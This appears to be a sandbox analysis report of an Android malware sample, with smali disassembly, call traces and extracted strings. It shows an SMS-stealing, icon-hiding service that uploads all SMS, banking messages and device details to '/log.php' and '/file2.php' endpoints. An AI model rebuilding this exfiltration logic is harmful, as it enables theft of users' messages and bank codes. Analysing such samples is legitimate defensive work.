                          • This:
                            • okhttp3.internal.connection.RealCall@a6f051
                          • Return:
                            • false
                        178move-result v6
                        179if-nez v6, :cond_19c
                        181iget-object v6, v1, Lokhttp3/internal/connection/ExchangeFinder;->connectionPool:Lokhttp3/internal/connection/RealConnectionPool;
                        183iget-object v7, v1, Lokhttp3/internal/connection/ExchangeFinder;->address:Lokhttp3/Address;
                        185iget-object v8, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        187invoke-virtual {v6, v7, v8, v5, v3}, Lokhttp3/internal/connection/RealConnectionPool;->callAcquirePooledConnection(Lokhttp3/Address;Lokhttp3/internal/connection/RealCall;Ljava/util/List;Z)Z
                        188move-result v3
                        189if-eqz v3, :cond_10d
                        191iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        193invoke-virtual {v0}, Lokhttp3/internal/connection/RealCall;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        194move-result-object v0
                        196invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        198iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->eventListener:Lokhttp3/EventListener;
                        200iget-object v3, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        201check-cast v3, Lokhttp3/Call;
                        202move-object v4, v0
                        203check-cast v4, Lokhttp3/Connection;
                        205invoke-virtual {v2, v3, v4}, Lokhttp3/EventListener;->connectionAcquired(Lokhttp3/Call;Lokhttp3/Connection;)V
                        206return-object v0
                        207cond_10d:
                        208invoke-virtual {v2}, Lokhttp3/internal/connection/RouteSelector$Selection;->next()Lokhttp3/Route;
                        209move-result-object v2
                        210move-object v3, v5
                        211goto_112: new-instance v13, Lokhttp3/internal/connection/RealConnection;
                        213iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->connectionPool:Lokhttp3/internal/connection/RealConnectionPool;
                        215invoke-direct {v13, v5, v2}, Lokhttp3/internal/connection/RealConnection;-><init>(Lokhttp3/internal/connection/RealConnectionPool;Lokhttp3/Route;)V
                        217iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        219invoke-virtual {v5, v13}, Lokhttp3/internal/connection/RealCall;->setConnectionToCancel(Lokhttp3/internal/connection/RealConnection;)V
                        220try_start_11e:
                        221iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        222move-object v11, v5
                        223check-cast v11, Lokhttp3/Call;
                        225iget-object v12, v1, Lokhttp3/internal/connection/ExchangeFinder;->eventListener:Lokhttp3/EventListener;
                        226move-object v5, v13
                        227move v6, p1
                        228move/from16 v7, p2
                        229move/from16 v8, p3
                        230move/from16 v9, p4
                        231move/from16 v10, p5
                        233invoke-virtual/range {v5 .. v12}, Lokhttp3/internal/connection/RealConnection;->connect(IIIIZLokhttp3/Call;Lokhttp3/EventListener;)V
                        234try_end_132:
                        235iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        236check-cast v4, Lokhttp3/internal/connection/RealConnection;
                        238invoke-virtual {v5, v4}, Lokhttp3/internal/connection/RealCall;->setConnectionToCancel(Lokhttp3/internal/connection/RealConnection;)V
                        240iget-object v4, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        242invoke-virtual {v4}, Lokhttp3/internal/connection/RealCall;->getClient()Lokhttp3/OkHttpClient;
                        243move-result-object v4
                        245invoke-virtual {v4}, Lokhttp3/OkHttpClient;->getRouteDatabase()Lokhttp3/internal/connection/RouteDatabase;
                        246move-result-object v4
                        248invoke-virtual {v13}, Lokhttp3/internal/connection/RealConnection;->route()Lokhttp3/Route;
                        249move-result-object v5
                        251invoke-virtual {v4, v5}, Lokhttp3/internal/connection/RouteDatabase;->connected(Lokhttp3/Route;)V
                        253iget-object v4, v1, Lokhttp3/internal/connection/ExchangeFinder;->connectionPool:Lokhttp3/internal/connection/RealConnectionPool;
                        255iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->address:Lokhttp3/Address;
                        257iget-object v6, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        259invoke-virtual {v4, v5, v6, v3, v0}, Lokhttp3/internal/connection/RealConnectionPool;->callAcquirePooledConnection(Lokhttp3/Address;Lokhttp3/internal/connection/RealCall;Ljava/util/List;Z)Z
                        260move-result v0
                        261if-eqz v0, :cond_175
                        263iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        265invoke-virtual {v0}, Lokhttp3/internal/connection/RealCall;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        266move-result-object v0
                        268invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        269iput-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->nextRouteToTry:Lokhttp3/Route;
                        271invoke-virtual {v13}, Lokhttp3/internal/connection/RealConnection;->socket()Ljava/net/Socket;
                        272move-result-object v2
                        274invoke-static {v2}, Lokhttp3/internal/Util;->closeQuietly(Ljava/net/Socket;)V
                        276iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->eventListener:Lokhttp3/EventListener;
                        278iget-object v3, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        279check-cast v3, Lokhttp3/Call;
                        280move-object v4, v0
                        281check-cast v4, Lokhttp3/Connection;
                        283invoke-virtual {v2, v3, v4}, Lokhttp3/EventListener;->connectionAcquired(Lokhttp3/Call;Lokhttp3/Connection;)V
                        284return-object v0
                        285cond_175: monitor-enter v13
                        286try_start_176:
                        287iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->connectionPool:Lokhttp3/internal/connection/RealConnectionPool;
                        289invoke-virtual {v0, v13}, Lokhttp3/internal/connection/RealConnectionPool;->put(Lokhttp3/internal/connection/RealConnection;)V
                        291iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        293invoke-virtual {v0, v13}, Lokhttp3/internal/connection/RealCall;->acquireConnectionNoEvents(Lokhttp3/internal/connection/RealConnection;)V
                        295sget-object v0, Lkotlin/Unit;->INSTANCE:Lkotlin/Unit;
                        296try_end_182: monitor-exit v13
                        298iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->eventListener:Lokhttp3/EventListener;
                        300iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        301check-cast v2, Lokhttp3/Call;
                        302move-object v3, v13
                        303check-cast v3, Lokhttp3/Connection;
                        305invoke-virtual {v0, v2, v3}, Lokhttp3/EventListener;->connectionAcquired(Lokhttp3/Call;Lokhttp3/Connection;)V
                        306return-object v13
                        307catchall_190: move-exception v0
                        308monitor-exit v13
                        309throw v0
                        310catchall_193: move-exception v0
                        312iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        313check-cast v4, Lokhttp3/internal/connection/RealConnection;
                        315invoke-virtual {v2, v4}, Lokhttp3/internal/connection/RealCall;->setConnectionToCancel(Lokhttp3/internal/connection/RealConnection;)V
                        316throw v0
                        317cond_19c: new-instance v0, Ljava/io/IOException;
                        319const-string v2, "Canceled"
                        321invoke-direct {v0, v2}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
                        322check-cast v0, Ljava/lang/Throwable;
                        323throw v0
                        324cond_1a6: new-instance v0, Ljava/io/IOException;
                        326const-string v2, "Canceled"
                        328invoke-direct {v0, v2}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
                        329check-cast v0, Ljava/lang/Throwable;
                        330throw v0
                        APIs
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._service:Lanywheresoftware/b4a/objects/ServiceHelper
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv4:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.getObject
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • icon
                        • java.lang.String@5f3fc58
                        • java.lang.String@cb501d0
                        • fm
                        • pd
                        • ht
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        5new-instance v0, Lanywheresoftware/b4a/objects/NotificationWrapper;
                        7invoke-direct {v0}, Lanywheresoftware/b4a/objects/NotificationWrapper;-><init>()V
                        8const/4 v1, 0x2
                        10invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->Initialize2(I)V
                        12const-string v1, "icon"
                        14invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setIcon(Ljava/lang/String;)V
                        • Time: 688209
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper$NotificationData@f01b7ca
                          • Return:
                            • java.lang.Class@9f6fd3b
                            • getName: anywheresoftware.b4a.objects.NotificationWrapper$NotificationData
                        • Time: 688216
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper@8d59735
                          • Return:
                            • max_charging_current
                        • Time: 688208
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper@8d59735
                          • p0: status
                        • Time: 824521
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper$NotificationData@ed33cf6
                          • Return:
                            • java.lang.Class@8c818f7
                            • getName: anywheresoftware.b4a.objects.NotificationWrapper$NotificationData
                        • Time: 824522
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper@8a8591
                          • Return:
                            • java.lang.String@cb501d0
                        15const/4 v1, 0x0
                        17invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setSound(Z)V
                        19invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setVibrate(Z)V
                        21invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setLight(Z)V
                        23invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setInsistent(Z)V
                        25invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setAutoCancel(Z)V
                        27sget-object v2, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        29const-string v3, ""
                        31invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToCharSequence(Ljava/lang/Object;)Ljava/lang/CharSequence;
                        32move-result-object v4
                        34invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToCharSequence(Ljava/lang/Object;)Ljava/lang/CharSequence;
                        35move-result-object v5
                        37invoke-virtual {v0, v2, v4, v5, v3}, Lanywheresoftware/b4a/objects/NotificationWrapper;->SetInfoNew(Lanywheresoftware/b4a/BA;Ljava/lang/CharSequence;Ljava/lang/CharSequence;Ljava/lang/Object;)V
                        39sget-object v2, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        41iget-object v2, v2, Lcom/MrXnxVip/global/firebasemessaging;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        43invoke-virtual {v0}, Lanywheresoftware/b4a/objects/NotificationWrapper;->getObject()Ljava/lang/Object;
                        44move-result-object v0
                        45check-cast v0, Landroid/app/Notification;
                        46iput-object v0, v2, Lanywheresoftware/b4a/objects/ServiceHelper;->AutomaticForegroundNotification:Landroid/app/Notification;
                        48sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv4:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;
                        50sget-object v2, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        52const-string v4, "fm"
                        54invoke-virtual {v0, v2, v4}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;->Initialize(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        56sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        58sget-object v2, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        60const-string v4, "pd"
                        62invoke-virtual {v0, v2, v4}, Lcom/reza/sh/deviceinfo/DiviceInfo;->initialize(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        64sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        66sget-object v2, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        68invoke-static {}, Lcom/MrXnxVip/global/firebasemessaging;->getObject()Ljava/lang/Class;
                        69move-result-object v4
                        71const-string v5, "ht"
                        73invoke-virtual {v0, v2, v5, v4}, Lcom/MrXnxVip/global/httpjob;->_initialize(Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/Object;)Ljava/lang/String;
                        75sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        77invoke-static {v0, v1}, Lanywheresoftware/b4a/phone/Phone$PhoneWakeState;->KeepAlive(Lanywheresoftware/b4a/BA;Z)V
                        78return-object v3

                        15 Non-Executed Methods

                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._vvv4:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging._v0:Lanywheresoftware/b4a/objects/collections/List
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v0:Lanywheresoftware/b4a/objects/collections/List
                        • com.MrXnxVip.global.firebasemessaging._vv2:Lanywheresoftware/b4a/phone/SmsWrapper
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv1
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._vvv4:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv1
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._vvv4:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv3
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._vvv4:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vvv2:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv3:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv2
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vv7:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv6:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv6:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._vvv4:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vv0:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vvv5:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv2
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv1
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv6:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv6:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._vvv4:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._vvv1:Ljava/lang/String
                        • java.lang.String.equals
                        • com.MrXnxVip.global.firebasemessaging._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.firebasemessaging._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • \n
                        • &osVersion=
                        • no
                        • /log.php
                        • &model=
                        • &opr=
                        • result=ok&action=lastsms&androidid=
                        • &message=
                        • lastsms
                        • allsms.txt
                        • /file2.php?result=ok&action=uploadsms&androidid=
                        • 61310854
                        • true
                        • Sender :
                        • Text :
                        • Date :
                        • \ud83d\udda5\ud83d\udcf1Developer By @MrXnxVip
                        • 61310838
                        • Get SmS is OK
                        • getsms
                        • result=ok&action=unhide&androidid=
                        • unhide
                        • result=ok&action=hideicon&androidid=
                        • hide
                        • normal
                        • silent
                        • result=ok&action=banksms&androidid=
                        • &message22=
                        • getlastbank
                        • 61310795
                        • 61310791
                        • ok
                        • SendSingleMessage
                        • 61310785
